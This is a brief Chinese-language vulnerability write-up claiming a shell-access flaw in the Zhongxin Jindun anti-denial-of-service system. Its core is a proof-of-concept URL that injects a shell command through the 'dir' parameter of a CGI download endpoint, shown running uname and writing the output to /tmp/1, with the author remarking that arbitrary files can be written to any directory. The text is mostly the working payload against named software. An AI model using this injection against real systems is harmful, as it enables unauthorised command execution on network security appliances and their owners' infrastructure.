中新金盾抗拒绝服务系统GetShell漏洞2

文章目录

漏洞作者: Tea

漏洞证明:
https://1.1.1.1:28XXX/cgi-bin/index.php?t=analysis_download&c=tarfile&dir=1 || uname -a > /tmp/1||echo

命令:

uname -a > /tmp/1

写入到/tmp/1文件

可以写任意文件到任意目录,还愁啥?

1223415010234ed3c8ca3cbb4a02cb6fb70f6a03

 

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录